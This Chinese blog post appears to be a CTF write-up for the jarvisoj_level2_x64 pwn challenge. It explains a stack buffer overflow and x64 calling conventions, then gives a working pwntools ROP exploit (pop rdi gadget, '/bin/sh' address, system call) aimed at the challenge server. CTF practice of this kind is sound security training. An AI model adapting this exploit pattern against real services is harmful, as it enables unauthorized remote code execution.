当前位置: 首页 > news >正文

PWN手的成长之路-15-jarvisoj_level2_x64

image

file:
image

checksec:
image

查看 main 函数:
image
main 函数调用了 vulnerable_fuction() 函数,并且存在 system() 函数,尝试查找是否存在 /bin/sh 字符串。

shift + F12 发现存在 /bin/sh 字符串。
image

查看vulnerable_fuction() 函数:
image
存在溢出点。

溢出大小为:0x80+8
image

因为64位与32位的程序调用有所不同,32 位的参数是直接通过栈来进行传递的,而64位的程序则是通过 rdi,rsi,rdx,rcx,r8,r9寄存器依次传递的,而多余的参数才会通过栈传递,所以我们在构造 exp 的时候,就需要多加一个 rdi 寄存器的地址。

开始编写exp:

from pwn import *
r=remote('node5.buuoj.cn',29041)
context.arch='amd64'
context.os='Linux'binsh_addr = 0x600A90
system_addr = 0x4004C0
pop_rdi_addr=0x4006B3    #ROPgadget --binary pwn | grep rdi得到的payload=cyclic(0x80+0x8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
r.sendline(payload)
r.interactive()

得到了 flag。
image

http://www.hskmm.com/?act=detail&tid=29382

相关文章:

  • 2025.10.12——1绿
  • 价值博弈场的工程实现:构建数字文明的价值免疫系统——声明Ai生成
  • 基于 Rust 的英文数字验证码识别系统设计与实现
  • 2025年两联供室内机厂家最新权威推荐榜:技术实力与市场口碑
  • 2025武汉商铺装修防水厂家最新权威推荐榜:专业施工与品质保
  • 2025铝合金微弧氧化厂家权威推荐榜:表面处理技术实力深度解
  • 2025杉木木方厂家最新权威推荐榜:优质木材与稳定供应口碑之
  • 2025年厂房保养厂家最新权威推荐榜:专业维护与成本控制优选
  • 使用C语言实现重写stm32的启动文件
  • 2025中医师承权威推荐榜:名师带徒与临床实践深度解析
  • 让我们开始 CSS 的学习之旅
  • 2025液压无损扒胎机厂家权威推荐榜:高效无损与耐用性能深度
  • Linux环境下的UDEV机制及其与守护进程的关联
  • 在Red Hat Enterprise Linux 9上使用Docker快速安装并部署
  • [转] 基于ubuntu-base进行根文件系统的修改与打包
  • jquery 字符串转数字
  • AI圈每日技术学习---紧跟时代脚步(N8n工作流)
  • B -识别浮点常量问题
  • 小C语言--词法分析程序-A
  • 查寻MySQL或SQL Server的连接数,并配置超时时间和最大连接量
  • 2025宿舍上下床厂家权威推荐榜:耐用设计与空间优化口碑之选
  • 梳理一下Java中为保证线程安全提供了那些方案 - 浪矢
  • 处理Git错误:“invalid object [hash]”和“unable to read tree [hash]”
  • 2025厂房恒温恒湿设备厂家权威推荐榜:精准控温与节能技术深
  • 面向对象编程实验一
  • ABC 427 EF
  • SHA256文件完整性校验
  • 基于OpenEuler--docker容器化部署ceph集群 - 实践
  • 接口导入 jmeter
  • 深入理解MySQL的MVCC(多版本并发控制)实现原理